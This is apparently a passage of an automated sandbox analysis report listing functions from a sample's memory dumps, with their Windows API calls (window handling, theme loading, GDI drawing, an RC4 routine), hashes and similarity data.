                                                                                                                                                                                                                                  • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417598 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CaptureIconic
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2277910766-0
                                                                                                                                                                                                                                  • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                                                                                                                  • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00424194 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 0042419B
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                                                                                                                    • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                                                                                                                                                                    • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2671590913-0
                                                                                                                                                                                                                                  • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                                                                                                                  • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004125D8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                                                                                                                  • Instruction ID: 2c049f03cfb376e3baa0368465928f91904f6d03483072bf0e6cb5f6a46bccc5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A5102357082048FD710DB6ADA80A9BF3E5EF98314B2082BBD814C77A1D7B8AD91C75D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00478AC0 Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478C0E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: NtdllProc_Window
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4255912815-0
                                                                                                                                                                                                                                  • Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                                                                                                                  • Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D23C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CryptFour
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2153018856-0
                                                                                                                                                                                                                                  • Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                                                                                                                  • Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0045D254 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CryptFour
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2153018856-0
                                                                                                                                                                                                                                  • Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                                                                                                                  • Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 10001130 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3180893204.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3180366500.0000000010000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3181831800.0000000010002000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_10000000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                                                                                                                  • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 10001000 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3180893204.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3180366500.0000000010000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3181831800.0000000010002000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_10000000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                                                                                                                  • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0044B658 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 252libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                                  • API String ID: 1968650500-2910565190
                                                                                                                                                                                                                                  • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                                                                                                                  • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041CA0C Relevance: 33.2, APIs: 22, Instructions: 213windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                                                                                                                                                  • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                                                                                                                                                  • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                                                                                                                                                  • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                                                                                                                                                  • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                                                                                                                                                  • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                                                                                                                                                  • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                                                                                                                                                  • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                                                                                                                                                  • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                                                                                                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                                                                                                                                                  • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                                                                                                                                                    • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
